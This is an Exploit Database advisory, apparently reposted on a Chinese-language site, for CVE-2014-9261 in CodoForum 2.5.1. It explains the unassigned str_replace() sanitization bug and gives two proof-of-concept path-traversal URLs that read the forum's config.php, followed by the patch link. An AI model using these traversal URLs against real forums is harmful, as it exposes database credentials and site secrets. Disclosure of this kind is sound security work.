CodoForum 2.5.1 – Arbitrary File Download

• Exploit Database
• 123 阅读

• 作者： Kacper Szurek
  日期： 2015-03-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36320/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  # Exploit Title: Codoforum 2.5.1 Arbitrary File Download # Date: 23-11-2014 # Software Link: https://codoforum.com/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps # CVE: CVE-2014-9261   1. Description   str_replace() is used to sanitize file path but function output is not assigned to variable   private function sanitize($name) {   str_replace("..", "", $name); str_replace("%2e%2e", "", $name);   return $name; }   http://security.szurek.pl/codoforum-251-arbitrary-file-download.html   2. Proof of Concept   http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php or http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php   3. Solution:   Use patch:   https://codoforum.com/upgrades/codoforum.v.2.6.up.zip